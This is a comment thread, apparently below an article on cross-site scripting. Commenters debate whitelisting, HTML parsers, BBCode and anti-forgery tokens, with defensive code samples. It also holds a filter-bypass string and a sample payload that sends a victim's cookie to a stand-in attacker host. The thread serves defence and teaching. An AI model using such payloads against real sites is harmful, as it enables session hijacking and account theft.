Very nice to show the bad code, but somehow the way to protect yourself is always missing from these kinds of articles.
Regular expressions are not exactly bread and butter for everyone, so if you want the world to notice your warning and act on it, some cut-and-paste examples would be very helpful.

When will part two be published? In the ALA(A List Apart) publication?

Not being well versed in this subject, it sounds like a site is less likely to be susceptible to XSS(cross-site scripting) when one avoids using eval and avoids muddling style, structure and behavior through the style attribute and inline JavaScript. Is this the case? I know this is easier said than done.

It occurs to me that if someone just sat down and wrote a stack-based (not regex) parser based closely on stripped-down versions of the HTML, XHTML, XML and CSS specifications, we could have something that would deal quite nicely with attempted XSS attacks. Remember: these are all well-documented specifications, and the browsers, which trigger these XSS attacks, simply adhere to them.

The ad hoc “tricks” the article prescribes can fall victim to clever attackers. For instance, if you were to use str_replace('javascript', '', $html) your script would still be vulnerable to javasjavascriptcript (this is documented in the XSS cheatsheet posted above, excellent reading for anybody interested in HTML validation).
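To make the bypass concrete, here is a quick sketch in Python standing in for that PHP str_replace call (the logic is identical): a single-pass blacklist replace removes the inner copy of the word and splices the outer halves back together.

```python
# Python stand-in for str_replace('javascript', '', $html).
payload = "javasjavascriptcript"

# One pass removes the inner "javascript" and reassembles the outer one:
once = payload.replace("javascript", "")
print(once)  # -> javascript

# Looping until the string stops changing closes this particular hole,
# though a blacklist is still the wrong tool overall:
cleaned = payload
while "javascript" in cleaned:
    cleaned = cleaned.replace("javascript", "")
print(repr(cleaned))  # -> ''
```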

I think the problem there is that the browser (specifically IE in this case) _doesn’t_ adhere to the specifications; or at least, that it goes beyond the spec by parsing - and executing - sloppy and/or malformed code.

This can be partially mitigated by using a proper DTD for your documents, but you’re right. I suppose the idea about giving users a limited toolset would help prevent malformed code. However… if the parser makes the code *valid as well*, it shouldn’t be a problem.

Using real HTML, CSS and URI parsers seems like the most secure solution, and it only has to be done when processing the input, not every time it’s displayed.

In Java, there’s “TagSoup”:http://mercury.ccil.org/~cowan/XML/tagsoup/ for parsing just about any input HTML, which is a good idea anyway, a few “CSS Parsers”:http://www.w3.org/Style/CSS/SAC/ and the provided URI parser, and presumably other languages have the same.

If you include only the elements, attributes, CSS rules and URI schemes you do understand, and correctly escape the output with the right “character encoding”:http://www.w3.org/International/O-charset.html, I don’t see how anything can slip through.
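As a rough illustration of that whitelist-at-the-parser approach, here is a Python sketch using the standard library’s HTML parser. The allowed tag, attribute and scheme sets are deliberately tiny inventions of mine and would need careful extending; it also doesn’t repair unbalanced tags, so it’s a sketch of the idea, not a drop-in sanitizer.

```python
# Whitelist sketch: unknown elements are dropped, unknown attributes are
# dropped, attribute values must start with a known-safe URI scheme, and
# all text is escaped on the way out.
from html.parser import HTMLParser
from html import escape

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "a"}      # assumption: tiny demo set
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")

class Whitelist(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # drop unknown elements entirely
        safe = []
        for name, value in attrs:
            if (name in ALLOWED_ATTRS.get(tag, set())
                    and value and value.lower().startswith(SAFE_SCHEMES)):
                safe.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(safe)))

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(escape(data))

def sanitize(html):
    p = Whitelist()
    p.feed(html)
    p.close()
    return "".join(p.out)

print(sanitize('<a href="javascript:alert(1)">click</a>'))  # -> <a>click</a>
```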

Seems to me that if I were to summarise this article in a few words, capturing all the important information that is not already second nature to most web developers, it would be: _“The word ‘javascript’ can have line breaks (and spaces, and other separating chars?) in it.”_

All the stuff about escaping special characters, white-listing HTML elements, and being careful about CSS input, have been well-known for years. It’s just that this new ‘ja-vas-cript’ IE trick has come into the limelight recently, because of the MySpace exploit that the author mentions.

Partially in response to Brian Lepore (comment #8), I’d like to help underscore the threat of XSS. *Any time* user input is accepted (even if that input comes directly from a GET or POST variable), it needs to be properly escaped on output or you are at risk of an attack.

Here’s an example that brings it home for me. Imagine a site where you store a cookie for authorization. As you may know, cookie contents are accessible through Javascript. Imagine if this site’s login page would display error messages in the URL, like login.php?error=Incorrect password.

Seems innocent and common enough, but if I am an attacker, and I IM one of the site’s users with a URL like login.php?error=Incorrect password [removed]alert([removed])[removed]
(contrived example), you can see how I’d be able to manipulate the cookies and send their login cookie to my site (through a Javascript redirect). Similarly this can be used for phishing by sending the user to a fake login page via a link on the real site.
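For completeness, the fix on the output side is just consistent escaping before the value is echoed into the page. A Python sketch (html.escape is the rough equivalent of PHP’s htmlspecialchars; the payload below is invented for illustration, not the one from my example):

```python
from html import escape

# Invented attacker-supplied value arriving via login.php?error=...
error = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Escaped before being echoed into the page, it renders as harmless text:
print(escape(error, quote=True))
```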

With XmlHttpRequest, I’d even be able to force the user to perform actions (via HTTP POST/GET) on the site - such as the voting example given in this article.

To make matters worse, many of the new community sites that are springing up encourage the user to enter HTML, and correctly differentiating valid HTML from invalid HTML is a difficult process. This means that you can’t really use stuff like PHP’s strip_tags() function.

At the moment we’ve got a half-empty glass here. I can’t judge the contents just yet, because if I really want to get the taste I need the whole thing.
I’m sorry to say it, but I find this half of the article useless on its own. It might start making more sense when part two is out and about, but until then this reads like a very lengthy introduction.

I’m sorry that my previous post did not state this, but I am aware of the idea of validating input to protect users.

That said, I have never really understood why many sites have a tendency to use GET data as in your example, rather than using error code numbers. I know it is quite annoying to have to look up the different numbers when you want to use something, but it saves the worry of someone injecting HTML into your site. In my opinion, the security benefit outweighs the simplicity in development.
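A sketch of what the error-code approach looks like in practice (the codes and messages here are invented): the URL carries only a number, the server maps it to a fixed message, and no attacker-supplied text is ever echoed back.

```python
# Fixed server-side table: only these strings can ever reach the page.
ERRORS = {
    1: "Incorrect password.",
    2: "Unknown user name.",
    3: "Account locked.",
}

def error_message(raw_code):
    """Map the raw ?error=... query value to a canned message."""
    try:
        code = int(raw_code)
    except (TypeError, ValueError):
        code = 0  # anything non-numeric falls through to the default
    return ERRORS.get(code, "Login failed.")

print(error_message("1"))                   # -> Incorrect password.
print(error_message("<script>x</script>"))  # -> Login failed.
```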

I like the check_tags function in the first link that *ban jax* posted. It looks like a beefed up version of strip_tags that fits the needs of most developers that need to allow HTML.

bq. I like the check_tags function in the first link that ban jax posted. It looks like a beefed up version of strip_tags that fits the needs of most developers that need to allow HTML.

The Iamcal code is quite interesting, but it doesn’t guarantee XHTML 1.0 valid code, since it doesn’t check the children of the elements (a tag within a tag). Also, it’s not easily extensible to environments that need a broader tag base: there’s a lot more to XSS in attributes than a few protocols. Especially true if you decide to allow the style attribute (which, as the article points out, can execute JavaScript too! Fun.)

Shoot me, but I’m not sure why anyone would need image tags for most applications either.

Am I being totally short-sighted here, or can all these security holes be resolved in one simple stroke: don’t let your users personalise their space through real code!

My other half asked me a few days ago to help her style her MySpace stuff (and as it’s the first time I’ve really bothered going there I almost threw up when I saw how s**t it is code-wise) and then gave up after tearing my hair out for ages.

For a start it clearly says “please don’t use CSS to remove any MySpace ads” so immediately I set about doing just that - and succeeded. I then decided to play a little prank on her by adding “table {display:none}” to her style sheet and promptly destroyed the entire site in preview mode.

IMO these sorts of places - MySpace in particular - are so shoddily written that it would take a CSS expert to style the soup of nested tables, divs and junk into anything worth looking at. I doubt the majority of the user base are CSS experts (I know I’m not), and certainly in my experience anybody half web-dev savvy has their own blog on a crisp, clean blogging system - or has just written their bloody own!

I’m all for personalisation and marking your cyber-territory, but surely it’s quicker and easier for the users and safer for the admins to allow personalisation through forms and options. Let the user click the settings they want and the system generates the styles.

MySpace didn’t get popular because it was well-written ;-) It got popular because it gave users control.

However, I think that you do have a point in not letting users customize space through “real code.” Isn’t that what most forums and blogs do right now by not allowing HTML when they can avoid it? BBCode and Textile are much easier to secure than raw web input.
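A toy sketch of why BBCode-style input is easier to lock down than raw HTML: the input is never treated as HTML at all, so everything gets escaped first and only the codes you recognise become tags afterwards. (Python here, two made-up codes only; a real converter supports far more.)

```python
import re
from html import escape

def bbcode_to_html(text):
    # Neutralize all raw HTML up front, then turn known codes into tags.
    out = escape(text, quote=True)
    out = re.sub(r"\[b\](.*?)\[/b\]", r"<b>\1</b>", out)
    out = re.sub(r"\[i\](.*?)\[/i\]", r"<i>\1</i>", out)
    return out

print(bbcode_to_html("[b]hi[/b] <script>alert(1)</script>"))
# -> <b>hi</b> &lt;script&gt;alert(1)&lt;/script&gt;
```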

Well of course you don’t have to let them use real code. You could let them pick between the options you give them. But you could also just not accept their content, or their photos, or their comments..

Like the previous poster said, MySpace sold for many millions of dollars, and it was only because “making profiles pretty” really appeals to teenaged girls and the boys who lust for them. People like to do their own thing.

“But you could also just not accept their content, or their photos, or their comments..”

I think that’s a totally different ball game - not accepting customisation through real code has nothing to do with censorship.

I entirely agree that making “pretty profiles” is the attraction of MySpace and its ilk, but as it’s been mentioned, there are much more secure ways of going about it - allowing real-code submission is just asking for too much trouble.

I think MySpace giving their users the freedom to edit their templates’ CSS was a huge mistake. Sure, the default theme is ugly, but the things that the majority of people do to their MySpace pages are much worse. They just destroy them beyond any level of readability or sanity.

MySpace would be a nicer place without theme editing. Pure Volume is proof of this.

Your article makes a good case for the security measures necessary to hold back abuse of the system. The system still needs to be refined so that legitimate users are not kept out in the same stroke we use to stop abusers. Thanks for raising the topic so well…

I know the article is about XSS, but the example used points to another problem with a lot of these types of sites: not using a validation scheme for the ‘voting’ script, or for scripts that control other types of changes.

A simple check for a valid random unique id in voteOnAuser.php would kill any chance of an XSS vulnerability such as this having any effect, because the ‘vote’ would automatically be rejected.
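A sketch of that one-time id idea (Python, with invented names standing in for the voteOnAuser.php handler): each rendered form embeds a random token, and the handler rejects any request whose token was never issued, or was already used.

```python
import secrets

issued_tokens = set()  # in practice: stored server-side, per session

def issue_token():
    """Generate a random id to embed in the rendered voting form."""
    token = secrets.token_hex(16)
    issued_tokens.add(token)
    return token

def handle_vote(token):
    """Reject forged or replayed requests; count the rest once."""
    if token not in issued_tokens:
        return "rejected"
    issued_tokens.discard(token)  # one-time use
    return "counted"

t = issue_token()
print(handle_vote(t))         # -> counted
print(handle_vote(t))         # -> rejected (replay)
print(handle_vote("abc123"))  # -> rejected (forged)
```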

And a big applause to #28, if you’re going to allow customization then by all means have complete control over the code yourself.

All that customization of web application reminds me of an article on network security.

Pick your poison: do you want to restrict the user to a known and limited set of features, or chase all the hacks that people will find?

With the first approach you define and design it once; the other approach is a never ending race to ensure your application is safe from the known tricks and hacks.

OK, it takes more time to develop the white list, and it most certainly feels more restrictive from a user standpoint, but I guess it depends on whether you prefer to appear on the front page because your application is great or because somebody took control of other people’s accounts.
